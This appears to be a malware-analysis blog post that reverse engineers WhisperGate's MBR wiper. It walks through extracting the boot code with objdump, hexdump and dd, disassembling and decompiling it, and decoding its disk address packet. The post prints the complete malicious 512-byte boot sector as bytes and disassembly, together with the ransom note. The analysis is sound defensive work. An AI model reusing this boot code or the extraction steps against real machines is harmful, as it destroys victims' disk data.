Analyzing MBR Malware
Many years ago, I read through a catalog of master’s courses. One of the first courses in the program is about operating systems. The very first topic they explore is how to create a custom, operating-system-agnostic bootloader from scratch.
Custom bootloaders, much like custom inits and custom kernels, have a place in my heart where a Linux hobbyist still exists. The process is not necessarily difficult, but it does require a lot of reading into some narrow topics (such as the IA-32 Software Developer’s Manual, or relevant ARM64 resources on the topic). It can quickly become challenging depending on what exactly you want the boot code to do.
A good example of a widely known bootloader is GRUB. Most Linux desktop or server users know it through a handful of configurations and commands, like update-grub.
The grub-install command modifies the MBR on legacy BIOS systems, but most users aren’t interested in what it really does. Compared to a hand-written bootloader, the user may have limited visibility or control over the generated code. Often, it’s sufficient to know that it “just works.”
But where’s the fun in that?
Over the past decade, we’ve seen instances of ransomware and wipers leveraging MBR boot code for persistence and elevated privileges. My very first time hearing about MBR-based malware came with the reports of STUXNET. A few years later, a late friend in the Linux community had also brought it up (in a larger discussion about the desktop model’s attack surface).
This should raise a question: how difficult is it to write MBR malware? Before that, we should discuss the parameters for writing MBR boot code in general.
Malware in the MBR
Writing dubious or malicious boot code is a well-documented subject. If you’re new to the topic, I strongly recommend this writeup by Red Team Notes. It’s a fun starting point and a succinct introduction.
An interesting, if unfortunate, consequence of MBR code is that it runs in 16-bit “Real Mode.” This limits the boot code to a handful of rules and BIOS system interrupts.
Real-mode is also highly privileged. It runs well before the operating system loads, and therefore has precedence over Linux root or Windows Administrator privileges. If abused, this can cause severe damage to the system and hard disks, and the operating system may have no knowledge of it or any way to deter it.
An interesting feature of Real Mode is that it is operating-system agnostic by design. This means that you could develop a different malware loader for many operating systems or architectures that overwrites the victim’s MBR with the same boot code. In other words, while malware strains are often Windows-based, you could just as easily write a Linux or BSD variant and get the same outcome.
MBR boot code is more likely to use real mode only to execute a second stage in 32-bit “Protected Mode.” This second stage will contain more sophisticated boot code and is the basis of how bootloaders, including GRUB, operate behind the scenes. For malware authors, this could provide more opportunities for better attacks.
Most modern computers are likely to use UEFI, not BIOS, to boot. At the cost of some complexity, UEFI offers robust features such as Secure Boot, and generally has an easier time booting from flash storage, such as NVMe. This is usually a good thing.
So, why bring up MBR malware now? Lots of legacy systems still use BIOS. If your grandma is still playing Solitaire on her same Windows XP computer from the 2000s, she’s probably running BIOS with MBR. The same is true for agencies or organizations running the same systems from ten, twenty, or thirty years ago.
As malware in and of itself, STUXNET is often considered one of the greats. At least, it’s one of the most widely studied. You can certainly find samples online as well as an entire GitHub repo with the code reverse engineered in C.
However, there are plenty of other MBR-based malware samples from the past decade. A notable example is a NotPetya variant, which employed a malicious MBR in order to facilitate ransomware. But another MBR-based sample caught my eye fairly recently: WhisperGate.
WhisperGate
WhisperGate is “a multi-stage wiper designed to look like ransomware.” The bit about being a wiper disguised as ransomware cannot be overstated. (It’s one reason why people will often recommend not to pay the attacker. With a wiper, the ransom money cannot recover your data, because even the attackers cannot recover your data.)
Campaigns which deployed WhisperGate targeted a handful of Ukrainian sectors, including government, nonprofit, and IT organizations. In September of last year, the group made headlines after U.S. authorities indicted several Russian officials who were linked to the malware campaign.
A well-documented WhisperGate variant used three stages: one to corrupt the bootloader (T1542), another to download the third stage from a Discord server, and a final one to both tamper with Windows Defender and to overwrite files from a pre-set list of extensions.
The first stage caught my attention.
CrowdStrike describes the MBR-corrupting routine with the following pseudocode:
for i_disk between 0 and total_detected_disk_count do
for i_sector between 1 and total_disk_sector_count, i_sector += 199, do
overwrite disk i_disk at sector i_sector with hardcoded data
done
done
Note: The bit about skipping 199 sectors was, and still is, interesting. My best guess here is coverage. By skipping every 199 sectors, you get a good-enough tradeoff for data corruption and total execution time.
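To get a feel for that tradeoff, here is a minimal Python sketch of the stride from the pseudocode above. The function names and the 10 MB disk are my own assumptions for illustration (they are not taken from the malware or from CrowdStrike), and I assume the upper bound is exclusive.

```python
def targeted_sectors(total_sectors, start=1, stride=199):
    """Sector numbers the pseudocode would overwrite on a single disk.

    Assumption: the loop's upper bound is exclusive.
    """
    return range(start, total_sectors, stride)


def coverage(total_sectors, start=1, stride=199):
    """Fraction of the disk's sectors that get overwritten."""
    return len(targeted_sectors(total_sectors, start, stride)) / total_sectors


if __name__ == "__main__":
    sectors_10mb = 10 * 1024 * 1024 // 512  # hypothetical 10 MB disk, 512-byte sectors
    hits = targeted_sectors(sectors_10mb)
    print(list(hits[:4]))                    # first few targeted sectors
    print(len(hits), f"{coverage(sectors_10mb):.2%}")
```

Only about one sector in every 199 is touched, which would keep the run short while still scattering damage across the whole disk.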
If you run WhisperGate in a public sandbox, it will likely do nothing. One sandbox in particular marked it safe because it probed the registry for two keys and aborted execution. This is likely defense evasion (T1497), as the key values were empty because of the sandbox configuration.
There’s a very good writeup on the malware, which I would strongly recommend reading. It covers the details succinctly and was a true starting point for this guide.
In my walkthrough here, I’ll simply expand on these findings by investigating a few questions:
- How could we determine this was MBR malware?
- What does the MBR boot code look like in the binary?
- How can you isolate the MBR boot code?
- How would you analyze the boot code using static and dynamic analysis?
To that end, we will take “the hard way” to investigate the boot code. The tools used here are well-known and open source, so you can follow along or follow up on anything discussed here. This guide uses a Unix-like environment for analysis.
Of note, we will spend far less time on the malicious installer, and far more time on the aspects of it that deal with the MBR code. The boot code specifically is the main point of discussion.
Extracting the MBR code
First, we need a sample of this malware. Both the CrowdStrike and the S2W guides investigate the sample with the following SHA256 hash:
a196c6b8ffcb97ffb276d04f354696e2391311db3841ae16c8c9f56f36a38e92
You can download this from sites like the Malware Bazaar. Unzip it with the password, and you’ll have an EXE whose name matches the hash value.
If you’re on a Linux system, use objdump.
If you’re on macOS, you can use the equivalent package from Homebrew:
/opt/homebrew/Cellar/x86_64-elf-binutils/<version>/bin/x86_64-elf-objdump
First, let’s confirm the file type:
$ file a196c6b8ffcb97ffb276d04f354696e2391311db3841ae16c8c9f56f36a38e92.exe
a196c6b8ffcb97ffb276d04f354696e2391311db3841ae16c8c9f56f36a38e92.exe: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
In this case, the filename is the same value as the hash. This is useful for initial analysis, but it’s a pretty long filename. Let’s copy it to wg.exe just for clarity moving forward:
cp a196c6b8ffcb97ffb276d04f354696e2391311db3841ae16c8c9f56f36a38e92.exe wg.exe
Next, let’s dump strings (annotated):
$ strings wg.exe
(A) !This program cannot be run in DOS mode.
...
(B) AAAAA
Your hard drive has been corrupted.
In case you want to recover all hard drives
of your organization,
You should pay us $10k via bitcoin wallet
1AVNM68gj6PGPFcJuftKATa4WLnzg8fpfv and send message via
tox ID 8BEDC411012A33BA34F49130D0F186993C6A32DAD8976F6A5D82C1ED23054C057ECED5496F65
with your organization name.
We will contact you to give further instructions.
...
(C) glob-1.0-mingw32
(D) GCC: (GNU) 6.3.0
...
(E) CreateFileW
...
(F) WriteFile
...
Of interest, we find:
- A: PE header artifact
- B: Ransom note, repeated several times
- C, D: Evidence that MinGW and GCC were used to build this
- E, F: File manipulation calls for Windows
There are other interesting strings, but this discussion is about the MBR code specifically, so let’s focus on that. We know from other research that WriteFile is the API function that overwrites the MBR. However, even without prior knowledge (or an entire writeup) of the installer, WriteFile is a good starting point for analysis, because it can indiscriminately overwrite sections of the hard drive.
With that in mind, let’s focus on these strings specifically:
- B tells us that the ransom note is not obfuscated or encrypted. This suggests that the MBR code may exist in cleartext, without any weird decoding or decryption routines. This makes it low-hanging fruit for analysis.
- F confirms that WriteFile is used in this sample.
- The call to CreateFileW at E opens the primary hard drive for writing the corrupted MBR code. Its result, a HANDLE type, becomes the first parameter in the call to WriteFile.
Disassemble and search for the call to WriteFile. Notice the binary is stripped, so we can’t grep the disassembly for something like call WriteFile. Instead, we need the virtual address of its import table entry.
We can use the following formula:
ImageBase + RVA = VirtualAddress
To get these values, call objdump with the -x parameter:
$ objdump -x wg.exe
...
ImageBase 00400000
...
vma: Ordinal Hint Member-Name Bound-To
--[snip]--
0000a180 <none> 04f3 WriteFile
...
In this case, the image base is 0x00400000 and the entry’s relative address (the vma column) is 0x0000a180.
So:
0x400000 + 0xa180 = 0x40a180
If we grep the disassembly for references to 40a180, we end up at the import thunk, a jmp through the import address table (IAT) entry:
$ objdump -D -b binary -Mintel -m i386 wg.exe | grep 40a180 -B 4
2ea0: ff 25 94 a1 40 00 jmp DWORD PTR ds:0x40a194
2ea6: 90 nop
2ea7: 90 nop
2ea8: ff 25 80 a1 40 00 jmp DWORD PTR ds:0x40a180
Since the jmp statement for WriteFile is at address 0x2ea8, let’s grep for references to 2ea8 instead:
$ objdump -D -b binary -Mintel -m i386 wg.exe | grep 2ea8
2ea8: ff 25 80 a1 40 00 jmp DWORD PTR ds:0x40a180
2ff9: e8 aa fe ff ff call 0x2ea8
In addition to the thunk itself, we also see a call to it at 0x2ff9, which confirms that WriteFile is used in this code.
Recall earlier that many results appeared containing the ransom note. To find which one is actually used, we can backtrack the assembly:
$ objdump -D -b binary -Mintel -m i386 wg.exe | grep 0x2ea8 -B 100
...
2f7a: be 20 40 40 00 mov esi,0x404020
...
2f81: 8d bd e8 df ff ff lea edi,[ebp-0x2018]
...
2f91: f3 a5 rep movs DWORD PTR es:[edi],DWORD PTR ds:[esi]
...
2fd1: 8d 85 e8 df ff ff lea eax,[ebp-0x2018]
...
2fed: c7 44 24 08 00 02 00 mov DWORD PTR [esp+0x8],0x200
2ff4: 00
2ff5: 89 44 24 04 mov DWORD PTR [esp+0x4],eax
2ff9: e8 aa fe ff ff call 0x2ea8
The snippet here shows how the data at 0x404020 is copied into a stack buffer at [ebp-0x2018] (the rep movs at 0x2f91), and how that buffer is then passed as an argument to the WriteFile call at 0x2ff9. Ignoring the intermediate copy, we could express the call in C like:
WriteFile(fileHandle, (LPCVOID)0x404020, 0x200, 0, 0)
In this case, the data at 0x404020 contains the ransom note needed. 512 (0x200) bytes, the size of the MBR, are used in the call to WriteFile. This is likely the MBR code, but we want to prove it before relying on assumptions. So, let’s get the file offset and see what data exists there.
To find the file offset, first get the .data section’s VMA and File Offset:
$ objdump -x wg.exe
...
Sections:
Idx Name Size VMA LMA File off Algn
...
1 .data 00002038 00404000 00404000 00003200 2**5
We can determine the file offset with:
VirtualOffset - DataSectionVMA + DataSectionFileOffset
So:
0x404020 - 0x404000 + 0x3200 = 0x3220.
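Both address calculations so far can be written down as a small Python sketch. The constants come from the objdump output above; the function names are hypothetical, and the bounds check assumes the section’s listed size also covers its data in the file.

```python
IMAGE_BASE = 0x400000        # ImageBase from `objdump -x`
DATA_VMA = 0x404000          # .data VMA
DATA_FILE_OFFSET = 0x3200    # .data "File off"
DATA_SIZE = 0x2038           # .data Size


def rva_to_va(rva, image_base=IMAGE_BASE):
    """Relative virtual address -> virtual address."""
    return image_base + rva


def va_to_file_offset(va, section_vma=DATA_VMA,
                      section_file_offset=DATA_FILE_OFFSET,
                      section_size=DATA_SIZE):
    """Virtual address inside a section -> offset in the file on disk."""
    if not section_vma <= va < section_vma + section_size:
        raise ValueError(f"{va:#x} is outside the section")
    return va - section_vma + section_file_offset


if __name__ == "__main__":
    print(hex(rva_to_va(0xA180)))            # WriteFile import entry
    print(hex(va_to_file_offset(0x404020)))  # buffer passed to WriteFile
```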
We can confirm this is correct using hexdump:
$ hexdump -C wg.exe | \
grep 3220 -A $((0x1F))
00003220 eb 00 8c c8 8e d8 be 88 7c e8 00 00 50 fc 8a 04 |........|...P...|
00003230 3c 00 74 06 e8 05 00 46 eb f4 eb 05 b4 0e cd 10 |<.t....F........|
00003240 c3 8c c8 8e d8 a3 78 7c 66 c7 06 76 7c 82 7c 00 |......x|f..v|.|.|
00003250 00 b4 43 b0 00 8a 16 87 7c 80 c2 80 be 72 7c cd |..C.....|....r|.|
00003260 13 72 02 73 18 fe 06 87 7c 66 c7 06 7a 7c 01 00 |.r.s....|f..z|..|
00003270 00 00 66 c7 06 7e 7c 00 00 00 00 eb c4 66 81 06 |..f..~|......f..|
00003280 7a 7c c7 00 00 00 66 81 16 7e 7c 00 00 00 00 f8 |z|....f..~|.....|
00003290 eb af 10 00 01 00 00 00 00 00 01 00 00 00 00 00 |................|
000032a0 00 00 41 41 41 41 41 00 59 6f 75 72 20 68 61 72 |..AAAAA.Your har|
000032b0 64 20 64 72 69 76 65 20 68 61 73 20 62 65 65 6e |d drive has been|
000032c0 20 63 6f 72 72 75 70 74 65 64 2e 0d 0a 49 6e 20 | corrupted...In |
000032d0 63 61 73 65 20 79 6f 75 20 77 61 6e 74 20 74 6f |case you want to|
000032e0 20 72 65 63 6f 76 65 72 20 61 6c 6c 20 68 61 72 | recover all har|
000032f0 64 20 64 72 69 76 65 73 0d 0a 6f 66 20 79 6f 75 |d drives..of you|
00003300 72 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 2c 0d |r organization,.|
00003310 0a 59 6f 75 20 73 68 6f 75 6c 64 20 70 61 79 20 |.You should pay |
00003320 75 73 20 20 24 31 30 6b 20 76 69 61 20 62 69 74 |us $10k via bit|
00003330 63 6f 69 6e 20 77 61 6c 6c 65 74 0d 0a 31 41 56 |coin wallet..1AV|
00003340 4e 4d 36 38 67 6a 36 50 47 50 46 63 4a 75 66 74 |NM68gj6PGPFcJuft|
00003350 4b 41 54 61 34 57 4c 6e 7a 67 38 66 70 66 76 20 |KATa4WLnzg8fpfv |
00003360 61 6e 64 20 73 65 6e 64 20 6d 65 73 73 61 67 65 |and send message|
00003370 20 76 69 61 0d 0a 74 6f 78 20 49 44 20 38 42 45 | via..tox ID 8BE|
00003380 44 43 34 31 31 30 31 32 41 33 33 42 41 33 34 46 |DC411012A33BA34F|
00003390 34 39 31 33 30 44 30 46 31 38 36 39 39 33 43 36 |49130D0F186993C6|
000033a0 41 33 32 44 41 44 38 39 37 36 46 36 41 35 44 38 |A32DAD8976F6A5D8|
000033b0 32 43 31 45 44 32 33 30 35 34 43 30 35 37 45 43 |2C1ED23054C057EC|
000033c0 45 44 35 34 39 36 46 36 35 0d 0a 77 69 74 68 20 |ED5496F65..with |
000033d0 79 6f 75 72 20 6f 72 67 61 6e 69 7a 61 74 69 6f |your organizatio|
000033e0 6e 20 6e 61 6d 65 2e 0d 0a 57 65 20 77 69 6c 6c |n name...We will|
000033f0 20 63 6f 6e 74 61 63 74 20 79 6f 75 20 74 6f 20 | contact you to |
00003400 67 69 76 65 20 66 75 72 74 68 65 72 20 69 6e 73 |give further ins|
00003410 74 72 75 63 74 69 6f 6e 73 2e 00 00 00 00 55 aa |tructions.....U.|
Note that the final bytes are 55 aa, the boot signature that marks the end of an MBR. We can also see the ransom note in cleartext. This confirms that the 512 bytes from 0x3220 through 0x341f contain the MBR.
To isolate the boot code, use dd and extract it to wg-bootcode.raw:
dd if=wg.exe of=wg-bootcode.raw bs=1 skip=$((0x3220)) count=$((0x200))
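If you would rather not trust a bare dd invocation, the same extraction can be sketched in Python with a check on the boot signature. This is only an illustration: the function name and command-line handling are my own, and the default offset is the 0x3220 derived above.

```python
import sys

SECTOR_SIZE = 512
BOOT_SIGNATURE = b"\x55\xaa"


def extract_boot_sector(pe_bytes, offset=0x3220):
    """Slice one 512-byte sector out of the EXE and verify it ends in 55 aa."""
    sector = pe_bytes[offset:offset + SECTOR_SIZE]
    if len(sector) != SECTOR_SIZE:
        raise ValueError("not enough data for a full sector")
    if sector[-2:] != BOOT_SIGNATURE:
        raise ValueError("missing 55 aa boot signature")
    return sector


# Usage (hypothetical): python extract.py wg.exe wg-bootcode.raw
if __name__ == "__main__" and len(sys.argv) == 3:
    with open(sys.argv[1], "rb") as src:
        boot = extract_boot_sector(src.read())
    with open(sys.argv[2], "wb") as dst:
        dst.write(boot)
```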
At this point, you could apply the boot code to a RAW image and try it out yourself. To supplement this walkthrough, I’ve shared a script that will simulate the outcome in QEMU, then dump the results for analysis. You can adjust the parameters to see how hard disks of different sizes are affected after N seconds (default 5 seconds over 10MB).
For now, you should convince yourself that the malware will corrupt the hard drive. On to static analysis.
Analyzing the malicious boot code
Now we can disassemble only the 16-bit bootcode:
$ objdump -D -b binary \
-mi386 \
-Maddr16,data16,intel \
wg-bootcode.raw
wg-bootcode.raw: file format binary
Disassembly of section .data:
00000000 <.data>:
0: eb 00 jmp 0x2
2: 8c c8 mov ax,cs
4: 8e d8 mov ds,ax
6: be 88 7c mov si,0x7c88
9: e8 00 00 call 0xc
c: 50 push ax
d: fc cld
e: 8a 04 mov al,BYTE PTR [si]
10: 3c 00 cmp al,0x0
12: 74 06 je 0x1a
14: e8 05 00 call 0x1c
17: 46 inc si
18: eb f4 jmp 0xe
1a: eb 05 jmp 0x21
1c: b4 0e mov ah,0xe
1e: cd 10 int 0x10
20: c3 ret
21: 8c c8 mov ax,cs
23: 8e d8 mov ds,ax
25: a3 78 7c mov ds:0x7c78,ax
28: 66 c7 06 76 7c 82 7c mov DWORD PTR ds:0x7c76,0x7c82
2f: 00 00
31: b4 43 mov ah,0x43
33: b0 00 mov al,0x0
35: 8a 16 87 7c mov dl,BYTE PTR ds:0x7c87
39: 80 c2 80 add dl,0x80
3c: be 72 7c mov si,0x7c72
3f: cd 13 int 0x13
41: 72 02 jb 0x45
43: 73 18 jae 0x5d
45: fe 06 87 7c inc BYTE PTR ds:0x7c87
49: 66 c7 06 7a 7c 01 00 mov DWORD PTR ds:0x7c7a,0x1
50: 00 00
52: 66 c7 06 7e 7c 00 00 mov DWORD PTR ds:0x7c7e,0x0
59: 00 00
5b: eb c4 jmp 0x21
5d: 66 81 06 7a 7c c7 00 add DWORD PTR ds:0x7c7a,0xc7
64: 00 00
66: 66 81 16 7e 7c 00 00 adc DWORD PTR ds:0x7c7e,0x0
6d: 00 00
6f: f8 clc
70: eb af jmp 0x21
...
For now, it’s enough to note that the data corruption is a result of calling BIOS Interrupt 13h (disk operations) in mode 43h (extended write sectors to drive). The parameters for this interrupt:
Registers | Description |
---|---|
AH | 43h = function number for extended write |
AL | bit 0 = 0: close write check, bit 0 = 1: open write check, bit 1-7:reserved, set to 0 |
DL | drive index (e.g. 1st HDD = 80h) |
DS:SI | segment:offset pointer to the DAP |
You can refer to the disassembly to see where these parameters are set up and where the call occurs. I’ll refer back to them throughout the rest of this analysis.
A quick note: the virtual offset here is 0x7c00. This is a requirement for most (if not all) MBR code, as the boot code will load at this address. This is because real-mode boot code is just RAW data, and doesn’t follow a well-defined format like an ELF or PE. Put another way, the entire 512-byte image is treated as the “code section,” which is simply not accurate.
And that is important to know because the “data section” in this boot code is also not clearly defined as it would be in an ELF or PE file. That’s why you see statements like:
2: 8c c8 mov ax,cs
4: 8e d8 mov ds,ax
By storing the value of cs (code segment) into ds (data segment), the boot code is setting up the entire 512 bytes as writable data. This allows the boot code to use areas of the image as data and obviates the need for explicit data segments or stack buffers. You can see this in the usage of <SIZE> PTR ds:<address> in lines like:
45: fe 06 87 7c inc BYTE PTR ds:0x7c87
49: 66 c7 06 7a 7c 01 00 mov DWORD PTR ds:0x7c7a,0x1
...
52: 66 c7 06 7e 7c 00 00 mov DWORD PTR ds:0x7c7e,0x0
...
5d: 66 81 06 7a 7c c7 00 add DWORD PTR ds:0x7c7a,0xc7
...
66: 66 81 16 7e 7c 00 00 adc DWORD PTR ds:0x7c7e,0x0
For example, the byte at location 0x87 is used to store the current hard drive index. The actual location here is just after the “AAAAA” string in the data area:
Disk Index As String
--------------------------------v--------------------------- -------v--------
00000080 00 00 41 41 41 41 41 00 59 6f 75 72 20 68 61 72 |..AAAAA.Your har|
We can see that the byte which holds the disk index is set to zero (0) initially. For each hard drive detected, this value will increase as the data-corruption routine continues. (Informationally, this also confirms that the malware will start by corrupting data on your primary hard drive.)
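Translating between runtime addresses (0x7c00-based) and offsets in the raw image comes up repeatedly, so here is a small Python sketch of that mapping. The helper names are hypothetical; the addresses 0x7c87 (disk index) and 0x7c88 (the string loaded into si at the top of the disassembly) come from the listing above.

```python
LOAD_ADDRESS = 0x7C00   # where the BIOS loads the boot sector
SECTOR_SIZE = 512


def image_offset(runtime_address):
    """Address seen in the disassembly -> offset inside the raw image."""
    offset = runtime_address - LOAD_ADDRESS
    if not 0 <= offset < SECTOR_SIZE:
        raise ValueError(f"{runtime_address:#x} is outside the boot sector")
    return offset


def read_cstring(image, runtime_address):
    """Read a NUL-terminated string, as the print loop at offset 0xe does."""
    start = image_offset(runtime_address)
    end = image.index(b"\x00", start)
    return image[start:end].decode("ascii", errors="replace")


def disk_index(image):
    """Initial value of the disk index byte."""
    return image[image_offset(0x7C87)]


if __name__ == "__main__":
    import sys
    if len(sys.argv) == 2:
        with open(sys.argv[1], "rb") as f:   # e.g. wg-bootcode.raw
            raw = f.read()
        print(disk_index(raw))
        print(read_cstring(raw, 0x7C88))
```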
At the cost of using less intuitive code, this approach is rather brilliant given the space limitations of the MBR and its rigid boot-code specification.
Another note: the entire 512 bytes will disassemble, but anything after location 0x70 is just data, so its disassembly is incorrect. How can we infer that?
If you look at line 0x3c, you’ll note that si now contains the address 0x7c72, which maps to offset 0x72 in the raw image. This is an argument in the interrupt 0x13 call, so it should point to data, not code. Notice also that no address prior to 0x7c72 is referenced anywhere in this code for use with data read-write operations.
We can infer that the code effectively ends just before this, with the jmp at 0x70, which establishes that the data-corrupting routine will literally never halt. Anything after that jmp is just data meant for read-write purposes. Put another way, the boot code will not attempt to write any data before 0x72, hence the clipped disassembly earlier.
The MBR boot code displays a message and overwrites hard-drive sectors. I’m more interested in this second behavior, and the rest of the guide will focus exclusively on it. The research discussed earlier provides a good explanation, but we can expand on a few concepts that it left out: decompilation, DAP, and LBA.
Decompilation
Let’s start with decompilation. Something I found interesting at first was that the author didn’t decompile the MBR code. I tried it myself by hand, and again with Ghidra, and compared the results.
Note: To load the MBR binary into Ghidra, you’ll have to import the RAW file as x86 16-bit Real Mode. When the disassembly listing loads, right-click the first line, then click Disassemble. This should produce the correct disassembly along with some attempts at decompiled logic.
MBR code is small, so it’s fairly easy to decompile on your own. My first attempt used a form of pseudocode. The result looked something like this:
while True, do
ds = cs
*((uint16_t *)(ds+0x78)) = cs
*((uint32_t *)(ds+0x76)) = 0x82
mode = 0x43 // Extended write mode
write_check = 0 // Disable write verification
disk_index = *((uint8_t *)(ds+0x87)) + 0x80 // Start at disk 1
dap_start_addr = 0x72 // Read from file offset 0x72
error, _ = interrupt(
0x13: interrupt_code,
mode: ah,
write_check: al,
disk_index: dl,
dap_start_addr: si
)
if error == 1, then
*((uint8_t *)(ds+0x87)) += 1
*((uint32_t *)(ds+0x7a)) = 1
*((uint32_t *)(ds+0x7e)) = 0
else
*((uint32_t *)(ds+0x7a)) += 0xc7 // ADD: advance the LBA by 199 sectors
*((uint32_t *)(ds+0x7e)) += cf // ADC: add the carry from the line above
end if
done
Something that makes BIOS interrupts challenging is their lack of mapping to C syntax. This pseudocode uses a syntax like:
interrupt(code, args...)
Where args... are register names passed in alphabetical order (AH, AL, DL, and SI). But still, there’s no “official” way to express this. In translating this to a high-level language, the “best” approach will likely assume that each register represents a global variable of the same name.
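To sanity-check the pseudocode, the loop can be replayed in Python against a mock BIOS. This is a sketch under stated assumptions, not the malware’s actual behavior on real hardware: the mock returns CF=1 whenever the LBA is past the end of a disk or the disk does not exist, and the simulation stops once every modeled disk has failed (the real loop never halts). The function name and the disk sizes are hypothetical.

```python
def simulate_wiper(disk_sector_counts, stride=0xC7):
    """Replay the overwrite loop against a mock BIOS.

    disk_sector_counts: one sector count per modeled hard disk.
    Returns {disk index: [LBAs that were overwritten]}.
    """
    written = {i: [] for i in range(len(disk_sector_counts))}
    disk_index = 0   # byte at 0x7c87
    lba = 1          # qword at 0x7c7a, initial value from the DAP

    # The real loop never halts; this sketch stops once every modeled
    # disk has returned an error.
    while disk_index < len(disk_sector_counts):
        # Mock INT 13h, AH=43h: CF=1 when the LBA is past the end of the disk.
        carry = lba >= disk_sector_counts[disk_index]
        if carry:
            disk_index += 1   # 0x45: inc byte [0x7c87]
            lba = 1           # 0x49 and 0x52: reset the LBA to 1
        else:
            written[disk_index].append(lba)
            lba += stride     # 0x5d and 0x66: add 199 to the LBA
    return written


if __name__ == "__main__":
    # Two hypothetical disks of 1000 and 300 sectors.
    print(simulate_wiper([1000, 300]))
```

Modeling the interrupt as a function that returns the carry flag is one way around the lack of a C-like syntax for BIOS calls.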
Many resources on reverse engineering will encourage you to write your own decompilation. The reason why is intuitive (learning moments), but sometimes it is also practical. To appreciate the practicality, let’s compare it to Ghidra’s decompilation of the same code block:
void FUN_0000_7c21(void)
{
char *pcVar1;
ulong *puVar2;
long *plVar3;
ulong uVar4;
code *pcVar5;
undefined2 unaff_CS;
bool bVar6;
do {
while( true ) {
*(undefined2 *)0x7c78 = unaff_CS;
*(char **)0x7c76 = s_AAAAA_0000_7c82;
bVar6 = 0x7f < *(byte *)((int)s_AAAAA_0000_7c82 + 5);
pcVar5 = (code *)swi(0x13);
(*pcVar5)();
if ((bVar6) || (bVar6)) break;
puVar2 = (ulong *)0x7c7a;
uVar4 = *puVar2;
*puVar2 = *puVar2 + 199;
plVar3 = (long *)0x7c7e;
*plVar3 = *plVar3 + (ulong)(0xffffff38 < uVar4);
}
pcVar1 = (char *)((int)s_AAAAA_0000_7c82 + 5);
*pcVar1 = *pcVar1 + '\x01';
*(undefined4 *)0x7c7a = 1;
*(undefined4 *)0x7c7e = 0;
} while( true );
}
Notice that these lines:
bVar6 = 0x7f < *(byte *)((int)s_AAAAA_0000_7c82 + 5);
pcVar5 = (code *)swi(0x13);
(*pcVar5)();
Represent this assembly excerpt:
35: 8a 16 87 7c mov dl,BYTE PTR ds:0x7c87
39: 80 c2 80 add dl,0x80
3c: be 72 7c mov si,0x7c72
3f: cd 13 int 0x13
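In this case, the DAP pointer (in SI) is not represented at all. It’s also not clear how bVar6 is being used (or if it’s used at all). Its expression, 0x7f < byte, matches the carry that add dl,0x80 would produce, so it seems to track CF from before the interrupt rather than the CF that INT 0x13 returns. This further complicates the next line: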
if ((bVar6) || (bVar6)) break;
The condition (bVar6) || (bVar6) seems redundant and appears to return a constant result. It appears to never break or always break, depending on the truthiness of the value. This is in sharp contrast to the IF/ELSE behavior, which is a bit more clear in the disassembly:
41: 72 02 jb 0x45 ; Error
43: 73 18 jae 0x5d ; Success
I say “a bit more clear” because the JB and JAE mnemonics use the value in CF to determine where to jump, and that may be less forthcoming than a deliberate IF-ELSE like we use in higher-level languages. (In addition, the JB statement is unnecessary here.) Regardless, you may appreciate why some people still encourage the “hard way” of analyzing disassembled code over blindly trusting decompiled code.
Disk Address Packet (DAP)
Another area that was briefly touched on in the original analysis was the disk address packet (DAP). This is defined in the BIOS Enhanced Disk Drive Specification Version 3.0 documentation on page 4.
Offset | Type | Description |
---|---|---|
0 | Byte | Packet size in bytes. Shall be 16 (10h) or greater. If the packet size is less than 16 the request is rejected with CF=1h and AH=01h. Packet sizes greater than 16 are not rejected, the additional bytes beyond 16 shall be ignored. |
1 | Byte | Reserved, must be 0 |
2 | Byte | Number of blocks to transfer. This field has a maximum value of 127 (7Fh). A block count of 0 means no data is transferred. If a value greater than 127 is supplied the request is rejected with CF=1 and AH=01. |
3 | Byte | Reserved, must be 0 |
4 | Double word | Address of transfer buffer. This is the buffer which Read/Write operations will use to transfer the data. This is a 32-bit address of the form Seg:Offset. If this field is set to FFFF:FFFF then the address of the transfer buffer is found at offset 10h |
8 | Quad word | Starting logical block address, on the target device, of the data to be transferred. This is a 64 bit unsigned linear address. If the device supports LBA addressing this value should be passed unmodified. If the device does not support LBA addressing the following formula holds true when the address is converted to a CHS value (…) |
Note: Because we’re working with a 32-bit architecture in mind, I’m omitting the last two rows, which discuss 64-bit quadwords.
This represents 16 bytes (0x10 bytes) of total space. Recall that, earlier, we observed that the data at 0x7c72 is used for the DAP. We can use the physical offset to get a range:
0x72 - (0x72 + 0x10) => 0x72 - 0x82
Let’s inspect these bytes:
00000070 eb af 10 00 01 00 00 00 00 00 01 00 00 00 00 00 |................|
00000080 00 00 41 41 41 41 41 00 59 6f 75 72 20 68 61 72 |..AAAAA.Your har|
This gives us a sequence:
10 00 01 00 00 00 00 00 01 00 00 00 00 00 00 00
This data structure is read as little endian, so the bytes will reverse. We can map this against the DAP specification:
File Offset | Value | Meaning |
---|---|---|
0x72 | 0x10 | Constant 16 (0x10) |
0x73 | 0x00 | Constant 0 |
0x74 | 0x01 | Transfer one block |
0x75 | 0x00 | Constant 0 |
0x76 | 0x00000000 | Transfer buffer offset |
0x7a | 0x0000000000000001 | Start at block one of the LBA |
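The same mapping can be checked mechanically with Python’s struct module. This is a minimal sketch: the field names are my own labels for the rows of the specification table, and I split the transfer buffer address into its offset and segment halves. The second call applies the DWORD that the instruction at offset 0x28 writes at runtime.

```python
import struct
from collections import namedtuple

DAP = namedtuple(
    "DAP",
    "size reserved1 block_count reserved2 buffer_offset buffer_segment lba",
)
DAP_FORMAT = "<BBBBHHQ"   # little endian, 16 bytes in total


def parse_dap(raw):
    """Decode the first 16 bytes of a disk address packet."""
    if len(raw) < struct.calcsize(DAP_FORMAT):
        raise ValueError("a DAP needs at least 16 bytes")
    return DAP._make(struct.unpack_from(DAP_FORMAT, raw))


# Bytes at file offsets 0x72 through 0x81 of the boot code.
on_disk = bytes.fromhex("10 00 01 00 00 00 00 00 01 00 00 00 00 00 00 00")

# At runtime, `mov DWORD PTR ds:0x7c76,0x7c82` rewrites bytes 4 through 7.
at_runtime = on_disk[:4] + struct.pack("<I", 0x7C82) + on_disk[8:]

if __name__ == "__main__":
    print(parse_dap(on_disk))
    print(parse_dap(at_runtime))
```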
Recall that, at the beginning of this loop, the value at 0x76 was assigned 0x7c82, the address of the “AAAAA” string that sits just before the ransom note:
28: 66 c7 06 76 7c 82 7c mov DWORD PTR ds:0x7c76,0x7c82
So the transfer buffer offset is really set to 0x00007c82 during runtime.
